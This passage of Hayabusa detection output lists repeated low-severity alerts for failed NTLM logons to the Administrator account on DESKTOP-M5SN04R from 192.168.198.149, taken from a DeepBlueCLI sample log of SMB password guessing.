NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: 